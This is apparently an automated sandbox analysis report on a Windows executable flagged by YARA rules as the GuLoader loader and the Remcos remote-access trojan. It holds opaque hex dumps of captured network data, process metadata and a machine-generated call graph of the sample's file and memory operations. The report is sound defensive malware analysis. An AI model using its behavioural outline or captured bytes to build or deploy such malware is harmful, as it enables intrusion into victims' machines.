                                                2025-01-11 07:11:49 UTC16384INData Raw: f5 15 f2 e7 78 cb c1 9d 0c 28 9d 7b 13 bf e9 ff eb 27 b8 92 9f 12 74 b1 36 d0 c5 9f 13 bd c5 aa c6 03 f9 a7 c0 a7 b6 d1 34 cd 87 f0 d7 17 52 ed 22 be e4 43 4b 03 88 05 91 8d d0 18 bd a0 65 c6 18 4f a8 4a 7b 3d 64 d5 a5 33 e9 0c be 0d b6 05 cc 87 80 aa 98 3b 90 f7 5e a0 19 64 a1 7a 11 77 0d a0 b0 cc 7a 7f b1 e3 aa 8c c9 d4 69 42 c0 f3 ca 30 3c fc cd ee 88 86 cb 08 25 61 0b 1e 14 ce 82 17 87 02 ba 1c 8b 01 99 1d 65 f7 a8 09 6c 2a 21 e3 ed 7e f4 19 6a ac bb fb ad 12 43 bf 86 29 af 56 57 f2 5f 90 ca 7b 8d d8 5f 34 d0 43 32 7a 92 a1 50 78 99 fc 59 98 14 b5 85 d1 2d e9 05 d7 d5 96 15 dc 5c 8d e1 f8 84 99 7a 7c f0 01 b0 a7 80 a3 88 01 1f 91 59 81 b4 43 26 b8 e1 ce f3 7f d5 ae a6 05 4c 2e 15 2b f8 ae ff b5 21 a6 5a d9 1a 51 e6 d8 21 46 81 50 aa 23 4b 69 49 b4 1d
                                                Data Ascii: x({'t64R"CKeOJ{=d3;^dzwziB0<%ael*!~jC)VW_{_4C2zPxY-\z|YC&L.+!ZQ!FP#KiI
                                                2025-01-11 07:11:49 UTC16384INData Raw: 4d a2 bd 95 29 bb fa 5a 97 fb d0 40 04 02 24 f4 a6 b0 74 f9 df 1d 64 de 02 e6 b2 9d 92 d8 0f 05 1f e9 9b e0 e6 81 e6 7f 2a 67 f9 9e 87 6d f2 91 88 98 32 cb 0a 3e a3 f3 f7 75 0a 87 69 78 fe 1d 18 76 56 a6 06 d7 c9 e0 42 cb 32 14 4c ec 1a 9e 78 e2 bd 0a 6d ec d3 2f 32 04 53 6a 87 12 a5 1b af ef 60 f9 d7 a2 e0 fa 53 95 bc bb f0 c9 4b 44 c5 bc 57 4b f1 cb f3 48 b1 dc d7 80 6f e5 82 39 97 63 91 d0 9b ae 0d 3f b9 85 a1 86 46 ae 41 75 43 9a ee 4b 2f b9 3b 9d 7f 95 f8 8c da 66 d3 67 87 94 81 5f a3 3e 84 f5 12 f6 6e 94 07 7f 3c 8b 25 55 3d 2c ef 6b ab 65 fc 9b 31 6d ac 08 04 76 de 40 86 4f 66 8a 70 75 2b c5 7b 1b 60 72 9a 3b c9 f5 3a 60 aa b9 f8 a9 eb da 87 1d 52 2a 99 ca 55 14 ba 83 27 be ab e1 65 6f 0d 69 3f 06 f5 26 76 05 d2 a9 82 b4 31 4e d9 37 08 73 80 05 c7
                                                Data Ascii: M)Z@$td*gm2>uixvVB2Lxm/2Sj`SKDWKHo9c?FAuCK/;fg_>n<%U=,ke1mv@Ofpu+{`r;:`R*U'eoi?&v1N7s
                                                2025-01-11 07:11:49 UTC16384INData Raw: d1 a5 43 e9 e7 83 eb aa 48 52 b0 88 1b b7 02 83 b5 c2 63 8a 71 d8 5a d9 80 1d 3b db 49 4f 00 da b8 d9 8f d3 30 91 e7 41 71 ed d2 70 40 40 35 14 03 66 28 0b 4a 1a ff a8 96 2f ad 46 99 44 1d 13 18 3d 99 28 44 3a 17 f1 ae f0 38 67 78 90 ca 90 4e 1b 81 ff 20 ff 78 25 c5 e8 36 b4 21 1d 73 5c c7 e1 67 bb f6 e8 22 8c 7c 84 68 0a 8c 46 b8 44 0c 02 01 bb 29 ef 79 02 da fc c6 47 42 8e b1 a7 6c 75 58 c1 28 3e 19 78 3f 1e d1 96 14 25 3c 26 c9 92 cb ee 1e 9c c0 7c a3 8c 5a 41 4a df 54 aa 74 8f e0 2c 7b 2a b6 30 84 17 0a 70 4e 83 0e aa 27 21 4e a0 d7 46 f6 27 1c fe f1 75 ba 59 09 b9 82 27 1e c2 dd f9 53 ba 26 22 ab 2d a9 4d ad 33 47 a2 f6 15 b0 08 e9 b8 be 0f 97 d6 32 1f 64 1c d8 70 1d 6b ed 29 18 86 ce 2d 31 5e b1 c5 ea 25 d6 41 90 b7 c2 94 fb c6 21 32 a2 f6 cc fe fa
                                                Data Ascii: CHRcqZ;IO0Aqp@@5f(J/FD=(D:8gxN x%6!s\g"|hFD)yGBluX(>x?%<&|ZAJTt,{*0pN'!NF'uY'S&"-M3G2dpk)-1^%A!2
                                                2025-01-11 07:11:49 UTC16384INData Raw: 6a 9e 67 6b c1 e6 98 5c c9 b9 e7 e1 1a 8d 4d 63 95 dc 02 d4 5b 45 95 16 81 cd bb 60 7f 78 e7 6d 6a a8 b7 95 3a d5 7c e4 71 7d 41 7d 51 c7 11 30 bb 6b bc bd 1c 1e 32 6f 33 18 10 5e 92 ef da 0e 21 4e cb 80 82 bb 95 4f b9 08 57 aa 57 39 00 f9 9d cc 76 a2 3b 0e aa e8 a4 16 15 91 0c 31 8f 27 a6 e8 e0 b5 f3 25 8d 55 f1 1f 88 08 ee 0e 56 0b bf bf 01 a8 52 33 83 e7 88 9e 2a 01 af 12 99 db e7 63 f7 dc 97 2e e0 67 71 35 9f a9 88 19 0a 28 ea 21 e0 ea 86 a0 05 d4 f6 c0 32 51 1b 82 31 6e 87 56 e3 63 5d f9 94 5c 93 b5 80 81 99 47 47 a3 a9 b6 b7 e8 25 0a 53 e1 ce fd 55 25 d1 d0 3e e9 87 47 3c 3f fe c8 01 40 ff 8a 53 45 df 62 0b b3 aa f6 a6 55 08 78 04 15 37 92 25 c1 5a af 1b 32 ef 3f 15 40 36 d6 2f 3d 57 b4 ce 5e bf a3 48 ec b3 1e 25 ee 9e 88 23 e9 cd b1 32 30 7a de f6
                                                Data Ascii: jgk\Mc[E`xmj:|q}A}Q0k2o3^!NOWW9v;1'%UVR3*c.gq5(!2Q1nVc]\GG%SU%>G<?@SEbUx7%Z2?@6/=W^H%#20z
                                                2025-01-11 07:11:49 UTC16384INData Raw: ca 86 dd 8b 23 18 4d 64 98 78 8e 80 d5 7a 91 c1 60 11 57 df ad f4 59 78 2e 59 47 98 87 1a 38 14 30 0c 5b 97 3b 18 3f 7a e0 62 ec 03 53 2c c1 16 fe 8e 1c c0 8b 50 0b c7 40 95 1b 26 1e 45 bc df 02 35 89 0f 32 82 48 2a 47 a3 62 f0 54 f7 ab 73 7b d8 ed 7a 22 86 ce a3 39 30 db 39 5b db 33 18 ec 70 13 1c e3 9d 68 f5 35 72 0c 54 5a cb b9 d1 08 28 23 67 36 3f ec 57 83 b1 db 06 23 9f f7 b3 f0 a3 20 4b 51 90 34 73 74 3f 4e 6e 3b a2 a5 87 44 78 f5 1f 7e d2 77 ca 61 6e bc 4e 68 a6 55 a2 56 a7 3a 57 d1 de a5 fb 39 01 ef 12 a9 bf af e4 00 0b 89 b4 01 6f a5 3a 17 83 5d 7f 20 91 a7 7f c8 ad cc 7a 47 f0 86 8a d5 bf 70 5a 42 7f 4f 39 58 46 3c 7e 53 f2 93 aa e8 97 25 49 28 04 79 a7 16 b2 e6 47 bc 3c 07 7c c1 dd 89 7d 70 b7 94 13 bd 48 10 c0 00 fe b6 c4 7b fa 0d 40 d2 66 19
                                                Data Ascii: #Mdxz`WYx.YG80[;?zbS,P@&E52H*GbTs{z"909[3ph5rTZ(#g6?W# KQ4st?Nn;Dx~wanNhUV:W9o:] zGpZBO9XF<~S%I(yG<|}pH{@f
                                                2025-01-11 07:11:49 UTC16384INData Raw: 95 8f ec 8f 90 0d 52 ff 7f 3d ba 71 cd 5d 8a 72 7f 03 de cb 46 d2 38 82 88 ea 7a f2 cc fe 77 ea e5 f1 cf fc fd d9 f1 44 e4 11 44 1c e0 a8 be 50 3d df b9 98 36 ee ab 04 86 2f 42 61 3b e3 a1 0b 44 f2 67 ee 04 05 c3 a3 af cc 91 c2 a5 93 25 f8 c0 88 ed 71 21 66 41 ba 35 43 b0 fd 4b 6a bb 74 06 a0 3c bd d7 77 73 72 fc f0 05 81 41 22 f7 08 cd 57 55 28 8b 05 aa eb 81 31 56 6b 6d fd eb c6 38 21 aa 33 c9 04 e7 19 cf 5b 05 34 3b 5d d5 e8 69 da c2 61 17 a1 96 6f da 9f 24 f4 d8 4b 9d a4 e5 aa 9b e8 6d 6f c1 29 0d 49 3a 08 a5 b7 8a 42 2b f6 87 fd ff 44 b6 19 93 3e 78 87 c4 d5 7f 11 a7 ff c0 31 6d 5e 75 2c 5c 51 6b 71 06 b5 4c 34 2d b0 5e 4d 48 99 8e cc e1 55 f9 1a b7 f4 fd a9 e3 05 f4 4c ec 56 31 5b c6 85 d6 fd f3 26 63 9b fc 6c 24 b3 17 ee e8 3c ae 1e cf f1 72 e9 d4
                                                Data Ascii: R=q]rF8zwDDP=6/Ba;Dg%q!fA5CKjt<wsrA"WU(1Vkm8!3[4;]iao$Kmo)I:B+D>x1m^u,\QkqL4-^MHULV1[&cl$<r
                                                2025-01-11 07:11:49 UTC16384INData Raw: ab 1b 79 97 8f 90 a2 99 17 78 d8 4d 4b 4f 50 ec 33 52 21 53 82 14 cb bc 73 4e 48 03 52 8a b2 14 23 33 cb 39 3b 40 68 b3 48 f8 62 d5 b6 87 fb 9c f4 4a 4e c1 d6 5f 7d 47 4f 44 08 f3 c0 44 2f 58 58 5b d0 54 65 d4 c3 3b 1f a5 32 67 aa eb 14 92 09 68 75 2d 4c 2f 66 f4 02 39 40 f6 a8 b2 ce 35 88 3b 11 e4 12 70 f0 af 34 75 dc 03 c7 e1 c4 16 2e 09 dc e6 66 86 f4 5e d6 67 da 61 52 4f 24 65 0b 47 3b aa 75 70 9a 39 bf 40 43 c9 61 99 c6 ab c6 65 d1 c8 4b 8c 76 ee 29 58 ab 39 f4 cb cd 39 4c 00 03 19 af a2 d0 ba 10 8d 83 18 78 84 05 f9 2b 7b 2b 4b d7 5d 59 45 99 a2 1c e9 9f 29 36 54 7d bd 8d 22 89 80 67 90 46 3b f7 42 d6 47 78 c2 5e 31 9e 57 f3 40 28 6e ee f7 c6 c9 97 ac 9a 92 b7 e9 cb 45 1f df 51 83 ec df 19 a8 95 78 48 9d 4c a8 9a 79 db d5 97 a0 b1 7d b2 fc 2a 20 ab
                                                Data Ascii: yxMKOP3R!SsNHR#39;@hHbJN_}GODD/XX[Te;2ghu-L/f9@5;p4u.f^gaRO$eG;up9@CaeKv)X99Lx+{+K]YE)6T}"gF;BGx^1W@(nEQxHLy}*


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:02:11:17
                                                Start date:11/01/2025
                                                Path:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ix8kxoBHDb.exe"
                                                Imagebase:0x400000
                                                File size:514'430 bytes
                                                MD5 hash:D09DBFCAACC4E72DC2FF2D9119B7B9F1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1444216544.0000000004C79000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:02:11:30
                                                Start date:11/01/2025
                                                Path:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ix8kxoBHDb.exe"
                                                Imagebase:0x400000
                                                File size:514'430 bytes
                                                MD5 hash:D09DBFCAACC4E72DC2FF2D9119B7B9F1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:21%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:19.3%
                                                  Total number of Nodes:1593
                                                  Total number of Limit Nodes:36
                                                  execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4188 405b78 4185->4188 4189 405b88 lstrcatW 4188->4189 4190 405b7e 4188->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4213 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4197 4211 405cac 4210->4211 4211->4180 4213->4197 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4228 406417 4215->4228 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4228 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4228 4225 406558 GetWindowsDirectoryW 4225->4228 4226 40667c 5 API calls 4226->4228 4227 4065d3 lstrcatW 4227->4228 4228->4216 4228->4219 4228->4220 4228->4223 4228->4225 4228->4226 4228->4227 4229 40658c SHGetSpecialFolderLocation 4228->4229 4230 40640a 10 API calls 4228->4230 4241 4062b6 4228->4241 4246 40632f wsprintfW 4228->4246 4247 4063e8 lstrcpynW 4228->4247 4229->4228 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4229->4231 4230->4228 4231->4228 4239 406689 4232->4239 4233 4066ff 4234 406704 CharPrevW 4233->4234 4236 406725 4233->4236 4234->4233 4235 4066f2 CharNextW 4235->4233 4235->4239 4236->4173 4238 4066de CharNextW 4238->4239 4239->4233 4239->4235 4239->4238 4240 4066ed CharNextW 4239->4240 4253 405cea 4239->4253 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4228 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4228 4247->4228 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4239 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4188 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4213 4284->4283 4287 40546b 4285->4287 4295 40550d 4285->4295 4286 405487 lstrlenW 4288 4054b0 4286->4288 4289 405495 lstrlenW 4286->4289 4287->4286 4290 40640a 17 API calls 4287->4290 4292 4054c3 4288->4292 4293 4054b6 SetWindowTextW 4288->4293 4291 4054a7 lstrcatW 4289->4291 4289->4295 4290->4286 4291->4288 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4213 4297 4061c2 4296->4297 4299 4061cf 4296->4299 4316 406034 4297->4316 4299->4213 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4311 405d97 4307->4311 4310 405d92 CharNextW 4308->4310 4308->4311 4309 405dbb 4309->4262 4309->4263 4310->4309 4311->4309 4312 405cea CharNextW 4311->4312 4312->4311 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4299 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4324 406082 4322->4324 4325 40640a 17 API calls 4323->4325 4324->4318 4324->4320 4326 4060cf 4325->4326 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4367 40165b 4365->4367 4370 40164a SetCurrentDirectoryW 4370->4367 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4370 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 5262 4053c4 5263 4053d4 5262->5263 5264 4053e8 5262->5264 5265 405431 5263->5265 5266 4053da 5263->5266 5267 4053f0 IsWindowVisible 5264->5267 5273 405407 5264->5273 5268 405436 CallWindowProcW 5265->5268 5269 4043ab SendMessageW 5266->5269 5267->5265 5270 4053fd 5267->5270 5271 4053e4 5268->5271 5269->5271 5275 404d1a SendMessageW 5270->5275 5273->5268 5280 404d9a 5273->5280 5276 404d79 SendMessageW 5275->5276 5277 404d3d GetMessagePos ScreenToClient SendMessageW 5275->5277 5278 404d71 5276->5278 5277->5278 5279 404d76 5277->5279 5278->5273 5279->5276 5289 4063e8 lstrcpynW 5280->5289 5282 404dad 5290 40632f wsprintfW 5282->5290 5284 404db7 5285 40140b 2 API calls 5284->5285 5286 404dc0 5285->5286 5291 4063e8 lstrcpynW 5286->5291 5288 404dc7 5288->5265 5289->5282 5290->5284 5291->5288 4856 401e49 4857 402c1f 17 API calls 4856->4857 4858 401e4f 4857->4858 4859 402c1f 17 API calls 4858->4859 4860 401e5b 4859->4860 4861 401e72 EnableWindow 4860->4861 4862 401e67 ShowWindow 4860->4862 4863 402ac5 4861->4863 4862->4863 4864 40264a 4865 402c1f 17 API calls 4864->4865 4866 402659 4865->4866 4867 4026a3 ReadFile 4866->4867 4868 405f61 ReadFile 4866->4868 4869 4026e3 MultiByteToWideChar 4866->4869 4870 402798 4866->4870 4873 40273c 4866->4873 4874 402709 SetFilePointer MultiByteToWideChar 4866->4874 4875 4027a9 4866->4875 4877 402796 4866->4877 4867->4866 4867->4877 4868->4866 4869->4866 4887 40632f wsprintfW 4870->4887 4873->4866 4873->4877 4878 405fbf SetFilePointer 4873->4878 4874->4866 4876 4027ca SetFilePointer 4875->4876 4875->4877 4876->4877 4879 405fdb 4878->4879 4886 405ff3 4878->4886 4880 405f61 ReadFile 4879->4880 4881 405fe7 4880->4881 4882 406024 SetFilePointer 4881->4882 4883 405ffc SetFilePointer 4881->4883 4881->4886 4882->4886 4883->4882 4884 406007 4883->4884 4885 405f90 WriteFile 4884->4885 4885->4886 4886->4873 4887->4877 4888 4014cb 4889 405450 24 API calls 4888->4889 4890 4014d2 4889->4890 5292 4016cc 5293 402c41 17 API calls 5292->5293 5294 4016d2 GetFullPathNameW 5293->5294 5295 4016ec 5294->5295 5301 40170e 5294->5301 5298 40672b 2 API calls 5295->5298 5295->5301 5296 401723 GetShortPathNameW 5297 402ac5 5296->5297 5299 4016fe 5298->5299 5299->5301 5302 4063e8 lstrcpynW 5299->5302 5301->5296 5301->5297 5302->5301 5303 404dcc GetDlgItem GetDlgItem 5304 404e1e 7 API calls 5303->5304 5311 405037 5303->5311 5305 404ec1 DeleteObject 5304->5305 5306 404eb4 SendMessageW 5304->5306 5307 404eca 5305->5307 5306->5305 5309 404f01 5307->5309 5310 40640a 17 API calls 5307->5310 5308 40511b 5313 4051c7 5308->5313 5314 40502a 5308->5314 5319 405174 SendMessageW 5308->5319 5312 40435f 18 API calls 5309->5312 5315 404ee3 SendMessageW SendMessageW 5310->5315 5311->5308 5322 404d1a 5 API calls 5311->5322 5335 4050a8 5311->5335 5318 404f15 5312->5318 5316 4051d1 SendMessageW 5313->5316 5317 4051d9 5313->5317 5320 4043c6 8 API calls 5314->5320 5315->5307 5316->5317 5327 4051f2 5317->5327 5328 4051eb ImageList_Destroy 5317->5328 5332 405202 5317->5332 5323 40435f 18 API calls 5318->5323 5319->5314 5325 405189 SendMessageW 5319->5325 5326 4053bd 5320->5326 5321 40510d SendMessageW 5321->5308 5322->5335 5336 404f23 5323->5336 5324 405371 5324->5314 5333 405383 ShowWindow GetDlgItem ShowWindow 5324->5333 5330 40519c 5325->5330 5331 4051fb GlobalFree 5327->5331 5327->5332 5328->5327 5329 404ff8 GetWindowLongW SetWindowLongW 5334 405011 5329->5334 5340 4051ad SendMessageW 5330->5340 5331->5332 5332->5324 5346 404d9a 4 API calls 5332->5346 5347 40523d 5332->5347 5333->5314 5337 405017 ShowWindow 5334->5337 5338 40502f 5334->5338 5335->5308 5335->5321 5336->5329 5339 404f73 SendMessageW 5336->5339 5341 404ff2 5336->5341 5344 404fc0 SendMessageW 5336->5344 5345 404faf SendMessageW 5336->5345 5354 404394 SendMessageW 5337->5354 5355 404394 SendMessageW 5338->5355 5339->5336 5340->5313 5341->5329 5341->5334 5344->5336 5345->5336 5346->5347 5349 405281 5347->5349 5351 40526b SendMessageW 5347->5351 5348 405347 InvalidateRect 5348->5324 5350 40535d 5348->5350 5349->5348 5353 4052f5 SendMessageW SendMessageW 5349->5353 5356 404cd5 5350->5356 5351->5349 5353->5349 5354->5314 5355->5311 5359 404c0c 5356->5359 5358 404cea 5358->5324 5360 404c25 5359->5360 5361 40640a 17 API calls 5360->5361 5362 404c89 5361->5362 5363 40640a 17 API calls 5362->5363 5364 404c94 5363->5364 5365 40640a 17 API calls 5364->5365 5366 404caa lstrlenW wsprintfW SetDlgItemTextW 5365->5366 5366->5358 5367 73b0103d 5370 73b0101b 5367->5370 5377 73b01516 5370->5377 5372 73b01020 5373 73b01027 GlobalAlloc 5372->5373 5374 73b01024 5372->5374 5373->5374 5375 73b0153d 3 API calls 5374->5375 5376 73b0103b 5375->5376 5379 73b0151c 5377->5379 5378 73b01522 5378->5372 5379->5378 5380 73b0152e GlobalFree 5379->5380 5380->5372 4901 40234e 4902 402c41 17 API calls 4901->4902 4903 40235d 4902->4903 4904 402c41 17 API calls 4903->4904 4905 402366 4904->4905 4906 402c41 17 API calls 4905->4906 4907 402370 GetPrivateProfileStringW 4906->4907 5381 4044cf lstrlenW 5382 4044f0 WideCharToMultiByte 5381->5382 5383 4044ee 5381->5383 5383->5382 5384 404850 5385 40487c 5384->5385 5386 40488d 5384->5386 5445 405a32 GetDlgItemTextW 5385->5445 5387 404899 GetDlgItem 5386->5387 5390 4048f8 5386->5390 5389 4048ad 5387->5389 5393 4048c1 SetWindowTextW 5389->5393 5396 405d68 4 API calls 5389->5396 5398 40640a 17 API calls 5390->5398 5407 4049dc 5390->5407 5443 404b8b 5390->5443 5391 404887 5392 40667c 5 API calls 5391->5392 5392->5386 5397 40435f 18 API calls 5393->5397 5395 4043c6 8 API calls 5400 404b9f 5395->5400 5401 4048b7 5396->5401 5402 4048dd 5397->5402 5403 40496c SHBrowseForFolderW 5398->5403 5399 404a0c 5404 405dc5 18 API calls 5399->5404 5401->5393 5409 405cbd 3 API calls 5401->5409 5405 40435f 18 API calls 5402->5405 5406 404984 CoTaskMemFree 5403->5406 5403->5407 5408 404a12 5404->5408 5410 4048eb 5405->5410 5411 405cbd 3 API calls 5406->5411 5407->5443 5447 405a32 GetDlgItemTextW 5407->5447 5448 4063e8 lstrcpynW 5408->5448 5409->5393 5446 404394 SendMessageW 5410->5446 5413 404991 5411->5413 5416 4049c8 SetDlgItemTextW 5413->5416 5420 40640a 17 API calls 5413->5420 5415 4048f1 5419 4067c2 5 API calls 5415->5419 5416->5407 5417 404a29 5418 4067c2 5 API calls 5417->5418 5426 404a30 5418->5426 5419->5390 5421 4049b0 lstrcmpiW 5420->5421 5421->5416 5423 4049c1 lstrcatW 5421->5423 5422 404a71 5449 4063e8 lstrcpynW 5422->5449 5423->5416 5425 404a78 5427 405d68 4 API calls 5425->5427 5426->5422 5431 405d09 2 API calls 5426->5431 5432 404ac9 5426->5432 5428 404a7e GetDiskFreeSpaceW 5427->5428 5430 404aa2 MulDiv 5428->5430 5428->5432 5430->5432 5431->5426 5433 404b3a 5432->5433 5435 404cd5 20 API calls 5432->5435 5434 404b5d 5433->5434 5436 40140b 2 API calls 5433->5436 5450 404381 KiUserCallbackDispatcher 5434->5450 5437 404b27 5435->5437 5436->5434 5438 404b3c SetDlgItemTextW 5437->5438 5439 404b2c 5437->5439 5438->5433 5441 404c0c 20 API calls 5439->5441 5441->5433 5442 404b79 5442->5443 5451 4047a9 5442->5451 5443->5395 5445->5391 5446->5415 5447->5399 5448->5417 5449->5425 5450->5442 5452 4047b7 5451->5452 5453 4047bc SendMessageW 5451->5453 5452->5453 5453->5443 5454 401b53 5455 402c41 17 API calls 5454->5455 5456 401b5a 5455->5456 5457 402c1f 17 API calls 5456->5457 5458 401b63 wsprintfW 5457->5458 5459 402ac5 5458->5459 5460 401956 5461 402c41 17 API calls 5460->5461 5462 40195d lstrlenW 5461->5462 5463 402592 5462->5463 5471 4014d7 5472 402c1f 17 API calls 5471->5472 5473 4014dd Sleep 5472->5473 5475 402ac5 5473->5475 5476 401f58 5477 402c41 17 API calls 5476->5477 5478 401f5f 5477->5478 5479 40672b 2 API calls 5478->5479 5480 401f65 5479->5480 5482 401f76 5480->5482 5483 40632f wsprintfW 5480->5483 5483->5482 5484 402259 5485 402c41 17 API calls 5484->5485 5486 40225f 5485->5486 5487 402c41 17 API calls 5486->5487 5488 402268 5487->5488 5489 402c41 17 API calls 5488->5489 5490 402271 5489->5490 5491 40672b 2 API calls 5490->5491 5492 40227a 5491->5492 5493 40228b lstrlenW lstrlenW 5492->5493 5494 40227e 5492->5494 5496 405450 24 API calls 5493->5496 5495 405450 24 API calls 5494->5495 5498 402286 5495->5498 5497 4022c9 SHFileOperationW 5496->5497 5497->5494 5497->5498 5256 40175c 5257 402c41 17 API calls 5256->5257 5258 401763 5257->5258 5259 405f0d 2 API calls 5258->5259 5260 40176a 5259->5260 5261 405f0d 2 API calls 5260->5261 5261->5260 5499 401d5d GetDlgItem GetClientRect 5500 402c41 17 API calls 5499->5500 5501 401d8f LoadImageW SendMessageW 5500->5501 5502 402ac5 5501->5502 5503 401dad DeleteObject 5501->5503 5503->5502 5504 4022dd 5505 4022e4 5504->5505 5508 4022f7 5504->5508 5506 40640a 17 API calls 5505->5506 5507 4022f1 5506->5507 5509 405a4e MessageBoxIndirectW 5507->5509 5509->5508 4397 73b02993 4398 73b029e3 4397->4398 4399 73b029a3 VirtualProtect 4397->4399 4399->4398 5510 401563 5511 402a6b 5510->5511 5514 40632f wsprintfW 5511->5514 5513 402a70 